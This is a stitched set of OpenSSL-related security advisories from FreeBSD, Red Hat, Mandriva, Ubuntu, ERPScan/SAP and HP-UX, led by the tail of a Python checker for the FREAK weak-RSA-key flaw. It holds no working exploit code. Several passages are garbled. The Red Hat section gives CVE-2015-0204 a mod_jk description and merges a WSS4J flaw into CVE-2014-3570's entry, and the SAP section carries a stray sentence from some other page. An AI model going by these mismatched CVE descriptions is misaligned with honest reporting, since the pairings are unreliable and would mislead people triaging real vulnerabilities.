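# Constructed sample keys: top bit set so the bit length is exactly 512 / 1024.
SKE_512 = build_rsa_ske(b"\x80" + b"\x00" * 63, b"\x01\x00\x01")
SKE_1024 = build_rsa_ske(b"\x80" + b"\x00" * 127, b"\x01\x00\x01")


if __name__ == "__main__":
    for suite, ske in [(0x002F, SKE_512), (0x002F, None), (0x0003, SKE_512), (0x0003, SKE_1024)]:
        ok, why = check_rsa_key_exchange(suite, ske)
        print(f"suite {suite:#06x} ske={'yes' if ske else 'no'} -> {'accept' if ok else 'reject'}: {why}")
```

The last return path matters for deployment: a client that merely disables export suites (for example with `!EXPORT` in an OpenSSL cipher string) still needs the patched library, because the downgrade was triggered by the server's choice of key, not by the suite the client asked for.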
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
We recommend that you upgrade your openssl packages.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-15:01.openssl Security Advisory
The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib
Module: openssl
Announced: 2015-01-14
Affects: All supported versions of FreeBSD.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.
II. Problem Description
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL
due to a NULL pointer dereference. [CVE-2014-3571]
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. [CVE-2015-0206]
When OpenSSL is built with the no-ssl3 option and an SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference. [CVE-2014-3569] This does not affect
FreeBSD's default build.
An OpenSSL client will accept a handshake using an ephemeral ECDH
ciphersuite using an ECDSA certificate if the server key exchange message
is omitted. [CVE-2014-3572]
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. [CVE-2015-0204]
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. [CVE-2014-8275]
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. [CVE-2014-3570]
III. Impact
An attacker who can send a carefully crafted DTLS message can cause server
daemons that use OpenSSL to crash, resulting in a Denial of Service.
[CVE-2014-3571]
An attacker who can send repeated DTLS records with the same sequence number
but for the next epoch can exhaust the server's memory and result in a Denial of
Service. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of
the session. [CVE-2015-0204]
A client could authenticate without the use of a private key. This only
affects servers which trust a client certificate authority which issues
certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of
the signature, it is possible to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all daemons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
-------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
-------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
<URL:https://www.openssl.org/news/secadv_20150108.txt>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206>
The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:01.openssl.asc>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.0 update
Advisory ID: RHSA-2015:0849-01
Product: Red Hat JBoss Enterprise Application Platform
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0849.html
Issue date: 2015-04-16
CVE Names: CVE-2014-3570 CVE-2014-3586 CVE-2014-8111
CVE-2015-0204 CVE-2015-0226 CVE-2015-0227
CVE-2015-0277
=====================================================================
1. Summary:
Updated packages that provide Red Hat JBoss Enterprise Application Platform
6.4.0, and fix multiple security issues, several bugs, and add various
enhancements, are now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having Important security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java
applications based on JBoss Application Server 7.
It was found that a prior countermeasure in Apache WSS4J for
Bleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an
exception that permitted an attacker to determine the failure of the
attempted attack, thereby leaving WSS4J vulnerable to the attack.
The original flaw allowed a remote attacker to recover the entire plain
text form of a symmetric key. (CVE-2015-0226)
A flaw was found in the way PicketLink's Service Provider and Identity
Provider handled certain requests. A remote attacker could use this flaw to
log in to a victim's account via PicketLink. (CVE-2015-0277)
It was discovered that a JkUnmount rule for a subtree of a previous JkMount
rule could be ignored. This could allow a remote attacker to potentially
access a private artifact in a tree that would otherwise not be accessible
to them. (CVE-2015-0204)
It was found that Apache WSS4J permitted bypass of the
requireSignedEncryptedDataElements configuration property via XML Signature
wrapping attacks. A remote attacker could use this flaw to modify the
contents of a signed request. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. Note that this issue occurred rarely and with a low probability,
and there is currently no known way of exploiting it. (CVE-2014-3570)
It was found that the Command Line Interface, as provided by Red Hat
Enterprise Application Platform, created a history file named
.jboss-cli-history in the user's home directory with insecure default file
permissions. This could allow a malicious local user to gain information
otherwise not accessible to them. (CVE-2014-3586)
The CVE-2015-0277 issue was discovered by Ondrej Kotek of Red Hat.
This release of JBoss Enterprise Application Platform also includes bug
fixes and enhancements. Documentation for these changes will be available
shortly from the JBoss Enterprise Application Platform 6.4.0 Release Notes,
linked to in the References.
All users of Red Hat JBoss Enterprise Application Platform 6.3 as provided
from the Red Hat Customer Portal are advised to apply this update.
The JBoss server process must be restarted for the update to take effect.
3. Solution:
The References section of this erratum contains a download link (you must
log in to download the update). Before applying this update, back up your
existing Red Hat JBoss Enterprise Application Platform installation and
deployed applications.
4. Bugs fixed (https://bugzilla.redhat.com/):
1126687 - CVE-2014-3586 JBoss AS CLI: Insecure default permissions on history file
1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK)
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
1182591 - CVE-2014-8111 Tomcat mod_jk: information leak due to incorrect JkMount/JkUnmount directives processing
1191446 - CVE-2015-0226 wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487)
1191451 - CVE-2015-0227 wss4j: Apache WSS4J doesn't correctly enforce the requireSignedEncryptedDataElements property
1194832 - CVE-2015-0277 PicketLink: SP does not take Audience condition of a SAML assertion into account
5. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3586
https://access.redhat.com/security/cve/CVE-2014-8111
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0226
https://access.redhat.com/security/cve/CVE-2015-0227
https://access.redhat.com/security/cve/CVE-2015-0277
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=appplatform&version=6.4
https://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
1.0.1h does not properly restrict processing of ChangeCipherSpec
messages, which allows man-in-the-middle attackers to trigger use of a
zero-length master key in certain OpenSSL-to-OpenSSL communications,
and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the CCS Injection vulnerability
(CVE-2014-0224).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before
1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square
of a BIGNUM value, which might make it easier for remote attackers to
defeat cryptographic protection mechanisms via unspecified vectors,
related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and
crypto/bn/bn_asm.c (CVE-2014-3570).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
does not enforce certain constraints on certificate data, which allows
remote attackers to defeat a fingerprint-based certificate-blacklist
protection mechanism by including crafted data within a
certificate's unsigned portion, related to crypto/asn1/a_verify.c,
crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c
(CVE-2014-8275).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws have been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293
http://openssl.org/news/secadv_20150108.txt
http://openssl.org/news/secadv_20150319.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm
9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm
58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm
b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm
a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm
521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL.
Software Description:
- openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
Pieter Wuille discovered that OpenSSL incorrectly handled Bignum squaring.
(CVE-2014-3570)
Markus Stenberg discovered that OpenSSL incorrectly handled certain crafted
DTLS messages. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2014-8275)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
key exchanges. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0205)
This issue only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes.
SAP <http://www.sap.com/> has released the monthly critical patch update
for June 2015. This patch update closes a lot of vulnerabilities in SAP
products. The most popular vulnerability is Missing Authorization Check.
This month, three critical vulnerabilities found by ERPScan researchers
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.
*Issues that were patched with the help of ERPScan*
Below are the details of SAP vulnerabilities that were found by ERPScan
<http://www.erpscan.com/> researchers.
* An XML eXternal Entity vulnerability in SAP Mobile Platform
on-premise (CVSS Base Score: 5.5). Update is available in SAP Security
Note 2159601 <https://service.sap.com/sap/support/notes/2159601>. An
attacker can use XML eXternal Entities to send specially crafted
unauthorized XML requests, which will be processed by the XML
parser. The attacker will get unauthorized access to the OS file system.
* A Hardcoded Credentials vulnerability in SAP Cross-System Tools
(CVSS Base Score: 3.6). Update is available in SAP Security Note 2059659
<https://service.sap.com/sap/support/notes/2059659>. In addition, it is likely that the
code will be implemented as a backdoor into the system.
* A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
(CVSS Base Score: 2.1). Update is available in SAP Security Note 2057982
<https://service.sap.com/sap/support/notes/2057982>. In addition, it is likely that the
code will be implemented as a backdoor into the system.
*The most critical issues found by other researchers*
Some of our readers and clients asked us to categorize the most critical
SAP vulnerabilities to patch them first. Companies providing SAP
Security Audit, SAP Security Assessment, or SAP Penetration Testing
services can include these vulnerabilities in their checklists. The most
critical vulnerabilities of this update can be patched by the following
SAP Security Notes:
* 2151237 <https://service.sap.com/sap/support/notes/2151237>: SAP GUI
for Windows has a Buffer Overflow vulnerability (CVSS Base
Score: 9.3). An attacker can use Buffer Overflow for injecting
specially crafted code into working memory, which will be executed
by the vulnerable application under the privileges of that
application. This can lead to the attacker taking complete control
over the application, denial of service, command execution, and
other attacks. In case of command execution, an attacker can obtain
critical technical and business-related information stored in the
vulnerable SAP system or escalate their own privileges. As for
denial of service, the process of the vulnerable component may be
terminated. For this time, nobody will be able to use this service,
which negatively influences business processes, system downtime,
and, consequently, business reputation. It is recommended to install
this SAP Security Note to prevent risks.
* 2129609 <https://service.sap.com/sap/support/notes/2129609>: SAP EP
JDBC Connector has an SQL Injection vulnerability (CVSS Base
Score: 6.5). An attacker can use SQL Injections with the help of
specially crafted SQL queries. They can read and modify sensitive
information from a database, execute administrative operations in a
database, destroy data or make it unavailable. In some cases, an
attacker can access system data or execute OS commands. It is
recommended to install this SAP Security Note to prevent risks.
* 1997734 <https://service.sap.com/sap/support/notes/1997734>: SAP RFC
runtime has a Missing Authorization Check vulnerability (CVSS Base
Score: 6.0). An attacker can use Missing Authorization Checks to
access a service without any authorization procedures and use
service functionality that has restricted access. It
is recommended to install this SAP Security Note to prevent risks.
* 2163306 <https://service.sap.com/sap/support/notes/2163306>: SAP
CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
(CVE-2015-0204, CVSS Base Score: 5.0). It allows an attacker to
intercept HTTPS connections between vulnerable clients and servers
and force them to use weakened encryption, which the attacker can
break to steal or manipulate sensitive data. All the attacks on this
page assume a network adversary (i.e. a man-in-the-middle) to tamper
with TLS handshake messages. The typical scenario to mount such
attacks is by tampering with the Domain Name System (DNS), for
example via DNS rebinding or domain name seizure. This attack
targets a class of deliberately weak export cipher suites. It is
recommended to install this SAP Security Note to prevent risks.
*References about the FREAK vulnerability:*
* SMACK: State Machine AttaCKs <https://www.smacktls.com/>
* Tracking the FREAK Attack <https://freakattack.com/>
* CVE-2015-0204
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
It is highly recommended to patch all those SAP vulnerabilities to
prevent business risks affecting your SAP systems.
SAP has traditionally thanked the security researchers from ERPScan for
the vulnerabilities they found on its acknowledgment page
<http://scn.sap.com/docs/DOC-8218>.
Advisories for those SAP vulnerabilities with technical details will be
available in 3 months on erpscan.com <http://www.erpscan.com/>.
--
Darya Maenkova
PR manager
<https://www.linkedin.com/company/2217474?trk=ppro_cprof>
<https://twitter.com/erpscan>
<http://erpscan.com/>
------------------------------------------------------------------------
e-mail: d.maenkova@erpscan.com <mailto:d.maenkova@erpscan.com>
address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
phone: 650.798.5255
erpscan.com <http://erpscan.com>
Release Date: 2015-02-25
Last Updated: 2015-02-25
Potential Security Impact: Remote Denial of Service (DoS) and other
vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running
OpenSSL.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before v0.9.8ze
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2015-0204 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to resolve these vulnerabilities. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I
HP-UX Release / HP-UX OpenSSL depot name
B.11.11 (11i v1): OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2): OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3): OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.001 or subsequent
HP-UX B.11.23
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.002 or subsequent
HP-UX B.11.31
==================
openssl.OPENSSL-CER
openssl.OPENSSL-CONF
openssl.OPENSSL-DOC
openssl.OPENSSL-INC
openssl.OPENSSL-LIB
openssl.OPENSSL-MAN
openssl.OPENSSL-MIS
openssl.OPENSSL-PRNG
openssl.OPENSSL-PVT
openssl.OPENSSL-RUN
openssl.OPENSSL-SRC
action: install revision A.00.09.08ze.003 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 25 February 2015 Initial release
Version:2 (rev.2) - 25 February 2015 Corrected bulletin number
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
